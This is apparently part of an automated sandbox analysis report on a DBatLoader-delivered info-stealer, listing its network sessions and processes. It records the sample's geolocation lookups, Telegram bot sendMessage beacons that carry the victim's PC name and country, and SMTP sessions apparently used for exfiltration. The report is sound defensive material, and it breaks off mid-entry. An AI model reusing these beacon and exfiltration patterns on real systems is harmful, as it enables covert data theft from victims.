NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd9cc1d19248cb4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1955&min_rtt=1947&rtt_var=747&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1447694&cwnd=189&unsent_bytes=0&cid=d82de755b2e75d61&ts=195&x=0"
2025-01-06 06:54:32 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 53701 | 188.114.97.3 | 443 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:33 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-06 06:54:33 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:54:33 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1461262
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jlNyefcL7o3ZxKPJsietoYM1EiHdlZnY%2BqmvfUXQb4phnj1n5h3y80Z%2Bf4mjJqsWVYWUe70nKKvaH71RG%2BjU9ifjqSoIQ3RYvyeX%2FnL00ww2Q3L9t%2Bb23lgzGLAyO8i68H5pSd0C"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd9cc211a794201-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2443&min_rtt=2429&rtt_var=921&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1202140&cwnd=225&unsent_bytes=0&cid=c6aad835eb5e261b&ts=132&x=0"
2025-01-06 06:54:33 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 53705 | 188.114.97.3 | 443 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:33 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-06 06:54:33 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:54:33 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1461262
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FcXB365aE%2BoDPlf7SSoXnSvPpzaiCe1F2RxdApwdv5IjABFj%2BP168UigIUO6v1StrWvBwwnubPrd4c9diULETqA2bzkreEbWcueoC5grR1NuovH2GQ1N5ZHYk1Vt%2B%2BBfFyVzsQjh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd9cc227bf15e7d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1716&rtt_var=660&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1637689&cwnd=227&unsent_bytes=0&cid=f1122c37c609f268&ts=138&x=0"
2025-01-06 06:54:33 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 53716 | 188.114.97.3 | 443 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:34 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-06 06:54:34 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:54:34 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1461263
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LLs3vZJM6kIetBporrwfa44AaDxkwGSLZTYh%2FBxfOOfSP%2BgiCn%2FOCkQxxy9%2BP74Hz1tSaZQ9vSWr2tVOrp6CualmVJ7lXPOgsfnLefoiFA6vgEKz6liObrFyDmfyNi%2BCdNApKCnF"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd9cc2a19360f39-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1717&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1667618&cwnd=249&unsent_bytes=0&cid=595234606d845870&ts=159&x=0"
2025-01-06 06:54:34 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 53718 | 188.114.97.3 | 443 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:34 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-06 06:54:34 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:54:34 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1461263
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k51Qj41Rnd91QPmSPZpAioYkNN1fpzbE0svs%2FeUm78%2Fxsyey6sPvT8pk%2BvWEHkwZrY9Gd6HskRkHJmmpx5DmXeCwYpvoHkY5ZrfZqL4M%2F66LU89nTMJwrM9cKl0mlqH4bdotsz%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd9cc2b4cc48c18-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1800&min_rtt=1796&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1597374&cwnd=206&unsent_bytes=0&cid=6185d8b31e888703&ts=157&x=0"
2025-01-06 06:54:34 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 53730 | 188.114.97.3 | 443 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:35 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-06 06:54:36 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:54:35 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1461265
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qrCNOPm1hAhd3UGlOdE%2FYM0Bssg5GXNaD8S7Ci5XunYHTOAXhlnthX6SRBHwhkRqxNnfF05UYPy2k%2Btqg5l19K%2BgGwBVOrkyaswAydeXbFAsNKYleMMfiuiY7W4dN5DAM%2FWjn3Uz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8fd9cc32bcf77d02-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1962&rtt_var=748&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1449851&cwnd=230&unsent_bytes=0&cid=087290e32b572354&ts=139&x=0"
2025-01-06 06:54:36 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 53731 | 188.114.97.3 | 443 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:36 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
2025-01-06 06:54:36 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:36 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461265
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LpobXGx74oNEEd0TvR9Abb4tiZPLMOdOjfulJEZUJ8Rtbqx%2FBiZGLvWB%2Fv2LL7cqkFR86OzcLR%2Fz5XziiTGTD7Y5iw6RVeYyz7gENVvU9FZJN%2B3Hu4WwJ8HsXh2E%2FoA7JAez4j2e"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc342e4742c8-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1733&min_rtt=1732&rtt_var=653&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1672394&cwnd=225&unsent_bytes=0&cid=deb32eb59412121b&ts=150&x=0"
2025-01-06 06:54:36 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 53734 | 149.154.167.220 | 443 | 7820 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:36 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:18:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: Keep-Alive
2025-01-06 06:54:36 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:36 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-06 06:54:36 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 53744 | 188.114.97.3 | 443 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:37 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
2025-01-06 06:54:37 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:37 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461266
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6p5vjyGq7azh%2F2DBFZXzXSzJ2RH858HQenkf%2BwnTdUFJGhWOWsBveYWbp249cuMkVATNa7U3a8wZcVtXYDBSgndEcqf07%2F0Ose%2BLEPgxfovAvpKzFLzvkMR8Llu4GodBFZywh1A"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc3cfb2c4251-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1673&rtt_var=670&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1745367&cwnd=248&unsent_bytes=0&cid=feebd3ea2ac23dbe&ts=142&x=0"
2025-01-06 06:54:37 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 53756 | 188.114.97.3 | 443 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:38 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
2025-01-06 06:54:39 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:39 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461268
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wH2Z8pmvX5OoF8p9DWGHLkiZbHNz%2BDlnv2ja8il%2BYcC%2B8fby2zRWb9vPgyeleuYLyGNM8N8EQzVJUzt%2BIp27vOR0A7mD1RMo6ItZVt%2BPAqBD9F1d2E6MsIIbdUVMw1YyUruh6GyO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc461be1f5f6-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1728&rtt_var=783&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1689814&cwnd=183&unsent_bytes=0&cid=f3e86d2c83e8359c&ts=159&x=0"
2025-01-06 06:54:39 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 53765 | 188.114.97.3 | 443 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:40 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
2025-01-06 06:54:40 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:40 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461269
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wAGFjnigq4h96PEHyn3P4zfl9ERUX%2BNdohUj7jj4UYjsaHnZiL6j6%2FSJhneeHbUWqEhXvc%2BAwqT0uaastaefh09vUF8czWR90Jh%2B%2FoC8YRGAX6Z5nY3lTN2ub1lMZnKjBWJb77lz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc4fbea20f8b-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1466&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1746411&cwnd=237&unsent_bytes=0&cid=e17bff394173b75d&ts=287&x=0"
2025-01-06 06:54:40 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 53779 | 188.114.97.3 | 443 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:41 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
2025-01-06 06:54:42 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:42 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461271
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OtcwuwTBwCZsEmqSII829OD1JqC90AbTTYV%2F9R5SfmlpKpvyi7UhHSyxPbLZZl1sf%2BRwVIENwZjJzA5xHGZi5j5faNi25czo9H1cIP3GmPphtPMiceDvy9WsQmjtkSOF%2BrxTUCbP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc587ce08c7b-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1817&rtt_var=688&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1581798&cwnd=186&unsent_bytes=0&cid=a3e398f1ee5ee832&ts=146&x=0"
2025-01-06 06:54:42 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 53788 | 188.114.97.3 | 443 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:43 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                                          Connection: Keep-Alive
2025-01-06 06:54:43 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:43 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 362
                                                                                                                                          Connection: close
                                                                                                                                          Age: 1461272
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          cf-cache-status: HIT
                                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ncEgBZHixXWCIlPY9ILupq35uFU4agmlhLDFTYbv6YiagDpzMQgNu%2Fngv3ycw%2FIr6N7nQqs10PC6AqN5TA7g6oVxjc2AQAoWpE4lB4KjGHzmvTYJ07G1uhD3L9TnmCCMzOvlIm1d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8fd9cc613f12ef9d-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1946&min_rtt=1942&rtt_var=737&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1476985&cwnd=134&unsent_bytes=0&cid=71241cbe5681076e&ts=157&x=0"
2025-01-06 06:54:43 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 53795 | 149.154.167.220 | 443 | 8016 | C:\Users\Public\Libraries\jphwmyiA.pif
Timestamp | Bytes transferred | Direction | Data
2025-01-06 06:54:44 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                          Host: api.telegram.org
                                                                                                                                          Connection: Keep-Alive
2025-01-06 06:54:44 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                          Server: nginx/1.18.0
                                                                                                                                          Date: Mon, 06 Jan 2025 06:54:44 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 55
                                                                                                                                          Connection: close
                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-06 06:54:44 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 6, 2025 07:54:33.341274977 CET | 587 | 53704 | 208.91.198.176 | 192.168.2.5 | 220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/06/25 06:54:33
Jan 6, 2025 07:54:33.341594934 CET | 53704 | 587 | 192.168.2.5 | 208.91.198.176 | EHLO 675052
Jan 6, 2025 07:54:33.491071939 CET | 587 | 53704 | 208.91.198.176 | 192.168.2.5 | 250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions
250-AUTH NTLM CRAM-MD5 LOGIN
250-SIZE 31457280
250-HELP
250-AUTH=LOGIN
250 STARTTLS
Jan 6, 2025 07:54:33.491281033 CET | 53704 | 587 | 192.168.2.5 | 208.91.198.176 | STARTTLS
Jan 6, 2025 07:54:33.648866892 CET | 587 | 53704 | 208.91.198.176 | 192.168.2.5 | 220 Ready to start TLS
Jan 6, 2025 07:54:43.715552092 CET | 587 | 53793 | 208.91.198.176 | 192.168.2.5 | 220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/06/25 06:54:43
Jan 6, 2025 07:54:43.715877056 CET | 53793 | 587 | 192.168.2.5 | 208.91.198.176 | EHLO 675052
Jan 6, 2025 07:54:43.863943100 CET | 587 | 53793 | 208.91.198.176 | 192.168.2.5 | 250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions
250-AUTH NTLM CRAM-MD5 LOGIN
250-SIZE 31457280
250-HELP
250-AUTH=LOGIN
250 STARTTLS
Jan 6, 2025 07:54:43.864168882 CET | 53793 | 587 | 192.168.2.5 | 208.91.198.176 | STARTTLS
Jan 6, 2025 07:54:44.022413015 CET | 587 | 53793 | 208.91.198.176 | 192.168.2.5 | 220 Ready to start TLS
Jan 6, 2025 07:54:50.854343891 CET | 587 | 53841 | 208.91.198.176 | 192.168.2.5 | 220 PLESK-WEB15.webhostbox.net ESMTP MailEnable Service, Version: 10.43-10.43- ready at 01/06/25 06:54:50
Jan 6, 2025 07:54:50.854557991 CET | 53841 | 587 | 192.168.2.5 | 208.91.198.176 | EHLO 675052
Jan 6, 2025 07:54:51.000725985 CET | 587 | 53841 | 208.91.198.176 | 192.168.2.5 | 250-PLESK-WEB15.webhostbox.net [8.46.123.189], this server offers 5 extensions
250-AUTH NTLM CRAM-MD5 LOGIN
250-SIZE 31457280
250-HELP
250-AUTH=LOGIN
250 STARTTLS
Jan 6, 2025 07:54:51.000953913 CET | 53841 | 587 | 192.168.2.5 | 208.91.198.176 | STARTTLS
Jan 6, 2025 07:54:51.155625105 CET | 587 | 53841 | 208.91.198.176 | 192.168.2.5 | 220 Ready to start TLS


                                                                                                                                          Target ID:0
                                                                                                                                          Start time:01:53:55
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                          Imagebase:0x420000
                                                                                                                                          File size:1'620'872 bytes
                                                                                                                                          MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:01:54:02
                                                                                                                                          Start date:06/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Windows\SysWOW64\brightness.exe
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'161'216 bytes
                                                                                                                                          MD5 hash:6047499517804F1EA76B508CA469DE99
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.2166181878.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000007.00000002.2130519568.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 26%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:8
